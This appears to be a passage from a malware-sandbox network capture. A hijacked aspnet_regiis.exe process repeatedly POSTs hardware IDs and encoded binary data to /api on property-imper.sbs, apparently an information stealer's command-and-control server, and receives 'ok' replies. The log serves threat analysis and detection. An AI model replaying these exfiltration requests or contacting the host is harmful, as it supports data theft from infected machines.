2024-11-23 14:10:04 UTC	887	IN	Data Raw: 69 77 77 4a 48 34 38 72 38 70 61 70 37 69 52 6b 68 49 73 41 30 78 41 77 6b 6e 30 30 75 54 73 64 39 42 56 45 64 6e 46 2b 50 4b 43 5a 78 67 6b 66 44 43 71 30 52 57 64 39 59 54 54 43 47 77 44 53 67 71 56 41 2f 6a 61 36 75 6c 38 33 78 5a 58 6b 74 44 67 6f 4e 77 71 50 6a 4e 71 4d 71 6a 4e 56 4c 57 2f 6c 5a 73 53 4a 51 39 50 54 38 70 48 73 4a 47 70 37 57 2b 51 54 52 2b 34 7a 2b 75 2b 30 44 41 37 59 58 4e 35 76 34 64 51 71 2f 58 44 33 52 55 74 41 45 64 4f 77 30 33 30 30 2b 2f 6b 65 74 38 54 56 5a 6e 46 36 72 72 53 4a 6a 59 71 59 7a 65 6a 79 6c 4f 68 75 5a 71 59 55 57 4a 45 51 56 4b 4e 47 37 44 78 37 75 6c 6c 6b 69 42 63 6c 38 7a 6e 70 4a 6f 34 64 54 67 73 4d 4b 71 48 44 2b 65 37 6e 70 49 44 4c 52 5a 44 52 4e 39 50 39 64 6e 6b 36 58 6e 51 45 46 69 55 7a 4f 61 31 Data Ascii: iwwJH48r8pap7iRkhIsA0xAwkn00uTsd9BVEdnF+PKCZxgkfDCq0RWd9YTTCGwDSgqVA/ja6ul83xZXktDgoNwqPjNqMqjNVLW/lZsSJQ9PT8pHsJGp7W+QTR+4z+u+0DA7YXN5v4dQq/XD3RUtAEdOw0300+/ket8TVZnF6rrSJjYqYzejylOhuZqYUWJEQVKNG7Dx7ullkiBcl8znpJo4dTgsMKqHD+e7npIDLRZDRN9P9dnk6XnQEFiUzOa1
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 33 66 39 36 0d 0a 72 61 46 6c 75 64 7a 2b 2b 37 30 79 34 70 4b 32 41 35 74 4d 70 64 6f 72 75 58 6d 42 34 73 42 55 64 45 78 30 69 77 6b 61 6e 74 62 35 42 4e 48 37 62 50 38 4b 44 51 4c 43 70 6a 57 54 53 6f 79 56 43 78 39 59 54 54 43 47 77 44 53 67 71 56 41 2f 76 5a 35 65 5a 33 31 67 64 52 6c 74 44 71 6f 4e 34 70 50 79 31 69 50 71 76 49 55 72 57 78 6d 34 38 51 4b 51 4e 49 52 39 39 47 73 4a 47 70 37 57 2b 51 54 52 2b 6a 39 75 65 69 79 79 42 35 46 47 38 35 71 4d 42 42 35 36 72 56 68 46 45 72 43 41 59 53 6a 55 44 38 30 75 44 76 65 4d 49 66 55 35 6a 51 35 37 76 54 4c 54 6f 76 59 7a 79 71 77 6b 57 73 75 70 4f 53 45 43 45 4a 54 55 37 4e 41 37 36 66 37 76 49 33 69 46 56 2b 6c 4d 33 79 73 63 74 6c 44 69 4a 69 4f 61 48 52 46 37 6a 37 67 74 30 57 49 45 51 65 43 73 78 Data Ascii: 3f96raFludz++70y4pK2A5tMpdoruXmB4sBUdEx0iwkantb5BNH7bP8KDQLCpjWTSoyVCx9YTTCGwDSgqVA/vZ5eZ31gdRltDqoN4pPy1iPqvIUrWxm48QKQNIR99GsJGp7W+QTR+j9ueiyyB5FG85qMBB56rVhFErCAYSjUD80uDveMIfU5jQ57vTLTovYzyqwkWsupOSECEJTU7NA76f7vI3iFV+lM3ysctlDiJiOaHRF7j7gt0WIEQeCsx
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 65 52 37 32 78 4a 55 6b 73 62 6b 73 74 63 73 4e 53 39 6c 4f 36 37 4c 55 4c 57 34 6e 70 55 62 4a 51 46 4b 52 38 35 52 38 39 36 70 70 44 66 58 44 52 2f 42 67 73 65 42 37 51 52 37 50 69 49 75 35 73 42 62 35 2b 33 62 6e 42 6b 72 43 6b 4a 59 77 31 48 2b 32 4f 6e 73 66 39 67 53 55 35 66 4d 38 72 72 62 4a 7a 55 75 5a 44 36 69 78 6c 4f 6a 75 5a 7a 64 58 32 77 44 58 67 71 56 41 39 6a 63 38 2f 41 31 2f 68 35 66 6e 74 4c 32 71 5a 6f 34 64 54 67 73 4d 4b 71 48 44 2b 65 78 6b 4a 63 59 4c 77 31 43 52 38 31 4b 2f 39 62 68 35 33 2f 43 46 46 57 4c 78 75 57 7a 31 53 30 2f 4b 57 41 34 71 73 4e 46 72 50 58 56 33 52 59 30 52 42 34 4b 37 55 6a 6d 2f 50 76 34 4e 38 39 62 52 74 6e 46 37 50 4b 43 5a 7a 49 74 62 54 61 73 77 56 79 69 75 4a 75 59 47 79 73 49 52 6b 72 4f 52 66 62 53 Data Ascii: eR72xJUksbkstcsNS9lO67LULW4npUbJQFKR85R896ppDfXDR/BgseB7QR7PiIu5sBb5+3bnBkrCkJYw1H+2Onsf9gSU5fM8rrbJzUuZD6ixlOjuZzdX2wDXgqVA9jc8/A1/h5fntL2qZo4dTgsMKqHD+exkJcYLw1CR81K/9bh53/CFFWLxuWz1S0/KWA4qsNFrPXV3RY0RB4K7Ujm/Pv4N89bRtnF7PKCZzItbTaswVyiuJuYGysIRkrORfbS
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 6b 64 58 35 62 48 36 4c 6e 63 4b 54 6f 6e 59 44 72 6d 69 52 65 67 72 64 76 46 55 51 73 65 53 30 7a 61 55 73 58 59 36 62 73 33 7a 31 74 47 32 63 58 73 38 6f 4a 6e 4e 69 31 6d 4f 71 50 44 58 36 43 32 6d 70 45 56 49 51 6c 43 51 38 6c 47 34 73 33 76 35 48 66 66 47 31 43 56 30 4f 36 33 32 69 74 37 62 79 77 77 76 6f 63 50 35 34 53 4d 6e 56 45 7a 53 6c 38 4b 79 6b 2b 77 68 36 6e 6c 65 73 49 5a 55 4a 6e 44 34 37 62 52 49 44 30 6e 62 54 53 6a 78 46 4b 68 74 4a 75 52 47 79 73 4d 54 45 54 41 52 66 54 5a 37 36 6f 35 6b 42 4a 48 32 5a 71 67 67 4e 63 70 4d 69 4a 71 4f 72 44 76 5a 75 65 71 31 59 52 52 4b 77 67 47 45 6f 31 48 2b 39 66 6c 37 33 2f 56 46 46 65 54 79 75 2b 39 79 43 59 30 4b 47 73 38 71 38 68 5a 6f 72 75 4a 6d 68 6f 6e 44 45 39 45 79 77 4f 2b 6e 2b 37 79 4e Data Ascii: kdX5bH6LncKTonYDrmiRegrdvFUQseS0zaUsXY6bs3z1tG2cXs8oJnNi1mOqPDX6C2mpEVIQlCQ8lG4s3v5HffG1CV0O632it7bywwvocP54SMnVEzSl8Kyk+wh6nlesIZUJnD47bRID0nbTSjxFKhtJuRGysMTETARfTZ76o5kBJH2ZqggNcpMiJqOrDvZueq1YRRKwgGEo1H+9fl73/VFFeTyu+9yCY0KGs8q8hZoruJmhonDE9EywO+n+7yN
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 5a 79 65 69 31 30 69 4d 31 4d 32 30 34 35 6f 6b 58 6f 4b 33 62 78 56 45 64 45 6b 46 4e 77 67 48 5a 32 50 4c 72 66 64 4d 65 55 39 6e 64 72 71 75 61 49 44 64 68 4e 48 65 72 79 31 71 6a 70 35 65 64 45 53 55 44 54 46 6a 43 54 50 33 63 36 65 39 6c 30 51 64 51 6b 73 66 6a 74 74 55 6f 4e 79 6c 6d 64 2b 69 48 55 4c 2f 31 77 39 30 39 4c 78 56 4d 43 4f 70 5a 35 74 6a 6c 2b 33 7a 64 47 52 2b 47 6a 50 6e 79 33 53 74 37 65 53 77 33 70 38 70 46 6f 72 53 52 6c 78 77 6b 43 30 4e 50 77 6b 66 30 31 4f 66 34 65 64 38 56 57 5a 4c 44 35 62 48 52 4c 54 55 6f 66 6e 66 6f 68 31 43 2f 39 63 50 64 4f 7a 63 46 53 30 61 50 62 66 76 4a 37 71 68 57 33 68 35 59 6c 64 53 67 72 5a 51 2b 65 79 5a 67 64 2f 36 48 58 71 6d 35 6d 4a 6f 5a 4a 41 46 47 51 63 31 4d 2b 74 48 75 2b 48 33 63 48 30 Data Ascii: Zyei10iM1M2045okXoK3bxVEdEkFNwgHZ2PLrfdMeU9ndrquaIDdhNHery1qjp5edESUDTFjCTP3c6e9l0QdQksfjttUoNylmd+iHUL/1w909LxVMCOpZ5tjl+3zdGR+GjPny3St7eSw3p8pForSRlxwkC0NPwkf01Of4ed8VWZLD5bHRLTUofnfoh1C/9cPdOzcFS0aPbfvJ7qhW3h5YldSgrZQ+eyZgd/6HXqm5mJoZJAFGQc1M+tHu+H3cH0
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 6f 70 6f 34 64 54 67 73 4d 4b 71 48 44 2b 65 31 6e 35 45 53 4b 77 70 4a 52 38 4a 45 2b 39 44 6a 35 47 58 66 45 46 65 56 79 75 32 67 30 43 30 70 4b 47 55 36 71 4d 39 46 70 50 58 56 33 52 59 30 52 42 34 4b 2f 30 6e 7a 30 2f 2f 6e 65 4a 41 4b 45 59 43 43 35 37 36 61 66 33 73 7a 66 6a 65 74 78 31 43 70 70 35 71 56 48 69 59 45 51 45 48 48 51 50 6e 62 35 2b 4e 78 30 52 68 65 6d 4d 4c 6c 73 74 4d 31 4e 6d 45 69 64 36 48 66 46 2f 2f 31 72 4a 45 61 48 51 64 51 43 74 49 4e 36 5a 2f 75 35 6a 65 49 56 56 36 4c 7a 2b 69 32 32 69 6f 39 4b 6d 30 32 70 63 64 58 70 4c 57 65 6c 68 34 71 41 30 74 41 78 45 72 69 31 2b 33 34 64 39 77 52 48 39 65 43 35 36 71 61 66 33 73 52 62 7a 79 71 78 31 71 79 39 59 54 54 43 47 77 44 53 67 71 56 41 2f 6a 55 34 75 78 38 30 78 5a 52 6b 73 6a Data Ascii: opo4dTgsMKqHD+e1n5ESKwpJR8JE+9Dj5GXfEFeVyu2g0C0pKGU6qM9FpPXV3RY0RB4K/0nz0//neJAKEYCC576af3szfjetx1Cpp5qVHiYEQEHHQPnb5+Nx0RhemMLlstM1NmEid6HfF//1rJEaHQdQCtIN6Z/u5jeIVV6Lz+i22io9Km02pcdXpLWelh4qA0tAxEri1+34d9wRH9eC56qaf3sRbzyqx1qy9YTTCGwDSgqVA/jU4ux80xZRksj
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 68 73 71 65 6a 61 72 7a 46 76 6c 74 4a 61 4e 46 6d 78 4b 42 6b 79 4e 47 36 43 52 71 65 35 6d 6b 45 30 50 79 35 6d 31 34 59 31 33 61 54 34 69 4c 75 62 52 46 2f 2f 6e 31 64 30 44 62 46 77 47 44 63 35 52 34 74 6e 71 2f 48 53 58 4b 32 47 35 79 65 79 78 31 69 59 38 59 53 4a 33 71 59 63 50 6e 76 57 59 6a 77 4e 6a 46 56 42 48 33 55 53 38 31 2f 6a 6e 65 35 42 62 48 39 58 47 36 37 37 66 49 43 74 75 66 69 65 74 79 30 48 72 73 59 6e 64 58 32 77 56 54 55 58 66 54 66 65 51 2b 50 78 36 77 42 5a 61 6e 6f 37 6f 6f 39 63 72 65 32 38 73 49 71 33 4c 55 61 71 67 31 49 77 48 4c 78 4a 42 42 73 56 53 2f 64 4f 70 31 54 6d 51 44 52 2f 42 67 74 57 78 31 43 6b 38 4e 33 31 36 68 73 78 62 70 4c 6d 61 6d 6c 46 69 52 45 41 4b 6c 52 43 2b 6e 2b 33 37 4e 34 68 46 44 63 4b 58 73 2b 57 4b Data Ascii: hsqejarzFvltJaNFmxKBkyNG6CRqe5mkE0Py5m14Y13aT4iLubRF//n1d0DbFwGDc5R4tnq/HSXK2G5yeyx1iY8YSJ3qYcPnvWYjwNjFVBH3US81/jne5BbH9XG677fICtufiety0HrsYndX2wVTUXfTfeQ+Px6wBZano7oo9cre28sIq3LUaqg1IwHLxJBBsVS/dOp1TmQDR/BgtWx1Ck8N316hsxbpLmamlFiREAKlRC+n+37N4hFDcKXs+WK
2024-11-23 14:10:04 UTC	1369	IN	Data Raw: 49 75 35 74 45 58 2f 2b 62 56 33 51 4e 73 58 41 59 4e 77 30 37 78 33 4f 66 70 5a 63 49 54 58 49 2f 42 70 34 7a 6b 41 6a 59 73 61 54 6d 68 2b 57 6d 47 76 34 75 51 48 69 73 36 65 48 33 63 52 4f 43 64 7a 2b 6c 68 30 31 55 52 32 64 71 67 36 70 6f 47 4d 54 46 68 4f 4b 47 48 47 65 65 78 32 38 56 52 43 51 6c 4c 54 38 4e 45 73 76 37 6a 2b 6e 72 66 45 68 2f 58 67 75 7a 79 67 6d 63 36 4b 33 77 36 71 63 41 62 6f 4b 2b 63 33 56 39 73 43 67 59 53 6a 55 4c 36 7a 2b 54 6c 63 4a 77 54 55 5a 65 43 2f 2f 7a 44 5a 79 31 68 4e 47 54 6f 68 30 58 6e 37 64 76 61 48 79 45 46 52 55 54 4f 55 65 4c 5a 36 76 78 30 6c 79 74 68 76 4d 2f 74 74 39 51 67 42 52 39 4e 50 62 62 4b 57 4b 44 33 75 35 6f 48 4c 7a 70 34 66 64 78 45 34 4a 33 50 36 57 48 54 56 52 48 5a 32 71 44 71 6d 67 59 78 4d Data Ascii: Iu5tEX/+bV3QNsXAYNw07x3OfpZcITXI/Bp4zkAjYsaTmh+WmGv4uQHis6eH3cROCdz+lh01UR2dqg6poGMTFhOKGHGeex28VRCQlLT8NEsv7j+nrfEh/Xguzygmc6K3w6qcAboK+c3V9sCgYSjUL6z+TlcJwTUZeC//zDZy1hNGToh0Xn7dvaHyEFRUTOUeLZ6vx0lythvM/tt9QgBR9NPbbKWKD3u5oHLzp4fdxE4J3P6WHTVRHZ2qDqmgYxM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:05 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=64RCD7D2DYJM8YJNXN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18168 Host: property-imper.sbs
2024-11-23 14:10:05 UTC	15331	OUT	Data Raw: 2d 2d 36 34 52 43 44 37 44 32 44 59 4a 4d 38 59 4a 4e 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 36 34 52 43 44 37 44 32 44 59 4a 4d 38 59 4a 4e 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 34 52 43 44 37 44 32 44 59 4a 4d 38 59 4a 4e 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 Data Ascii: --64RCD7D2DYJM8YJNXNContent-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--64RCD7D2DYJM8YJNXNContent-Disposition: form-data; name="pid"2--64RCD7D2DYJM8YJNXNContent-Disposition: form-data; name="lid"yau6Na--66424
2024-11-23 14:10:05 UTC	2837	OUT	Data Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
2024-11-23 14:10:06 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eb5mfbssq0k43deturv228ke3o; expires=Wed, 19-Mar-2025 07:56:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZfuBOR2R6zxiiaqLUZ%2FC6HkZfPnOmq9ukOnsiX5tyMyTcqeEOyN3ijoEO%2FJaXwqB6r2y9MtKjLIROl4jOcwbMyefEaBFYX6q6XBXEFrgPEXhwGpGR8lqDatnlbjr6cgAPViZFM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bda33cc778d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1893&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19132&delivery_rate=1506707&cwnd=32&unsent_bytes=0&cid=933bced5d4191b2e&ts=847&x=0"
2024-11-23 14:10:06 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:10:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:07 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3UIS0B34M4H4WG9KY7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8789 Host: property-imper.sbs
2024-11-23 14:10:07 UTC	8789	OUT	Data Raw: 2d 2d 33 55 49 53 30 42 33 34 4d 34 48 34 57 47 39 4b 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 33 55 49 53 30 42 33 34 4d 34 48 34 57 47 39 4b 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 55 49 53 30 42 33 34 4d 34 48 34 57 47 39 4b 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 Data Ascii: --3UIS0B34M4H4WG9KY7Content-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--3UIS0B34M4H4WG9KY7Content-Disposition: form-data; name="pid"2--3UIS0B34M4H4WG9KY7Content-Disposition: form-data; name="lid"yau6Na--66424
2024-11-23 14:10:08 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7gbc4ls79atl0094lop1cglovs; expires=Wed, 19-Mar-2025 07:56:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mn%2FGGJOX4th279b0ZE94NUIppoiQuu5Keo0cnOZ4cjOIY9YO91kHmKi037GSZlVPR73uVx0W%2BMSW%2BHiSgJpkdxknj2mQe0QmBZjg4sFboViStMJXksPqoTwwNj9qdCGdGOCQ73g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bdb0beec420a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9730&delivery_rate=1767554&cwnd=251&unsent_bytes=0&cid=5fd674f1ab6ce3b4&ts=786&x=0"
2024-11-23 14:10:08 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:10:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:10 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CJJFV06MJVGS7NF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20424 Host: property-imper.sbs
2024-11-23 14:10:10 UTC	15331	OUT	Data Raw: 2d 2d 43 4a 4a 46 56 30 36 4d 4a 56 47 53 37 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 43 4a 4a 46 56 30 36 4d 4a 56 47 53 37 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 4a 4a 46 56 30 36 4d 4a 56 47 53 37 4e 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 37 35 35 30 37 0d 0a 2d 2d Data Ascii: --CJJFV06MJVGS7NFContent-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--CJJFV06MJVGS7NFContent-Disposition: form-data; name="pid"3--CJJFV06MJVGS7NFContent-Disposition: form-data; name="lid"yau6Na--6642475507--
2024-11-23 14:10:10 UTC	5093	OUT	Data Raw: 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2024-11-23 14:10:10 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r30goritvmmrjalbhtpj3ppttj; expires=Wed, 19-Mar-2025 07:56:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgjrPesXJK%2FH625O1QElKLzun4GuOiIsPA%2BdhDRVl3llwcL7DKTtxGYl0X1qu7o9jAGolaZlNpPcado1HaUOjQj975emzfdM8Iy%2FD8jHoyDhsW59GT4BZcMjVD61jXHFC8GfLCo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71bdbe4ba0435e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1779&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21385&delivery_rate=1644144&cwnd=238&unsent_bytes=0&cid=039b017a468f36ad&ts=882&x=0"
2024-11-23 14:10:10 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:10:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.33.116	443	7700	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:10:12 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5TETUHCUZXBZSQTUK6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1308 Host: property-imper.sbs
2024-11-23 14:10:12 UTC	1308	OUT	Data Raw: 2d 2d 35 54 45 54 55 48 43 55 5a 58 42 5a 53 51 54 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 41 37 39 34 35 37 33 32 37 44 46 42 37 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 35 54 45 54 55 48 43 55 5a 58 42 5a 53 51 54 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 54 45 54 55 48 43 55 5a 58 42 5a 53 51 54 55 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 36 34 32 34 Data Ascii: --5TETUHCUZXBZSQTUK6Content-Disposition: form-data; name="hwid"858A79457327DFB7C8852029FBE145BA--5TETUHCUZXBZSQTUK6Content-Disposition: form-data; name="pid"1--5TETUHCUZXBZSQTUK6Content-Disposition: form-data; name="lid"yau6Na--66424
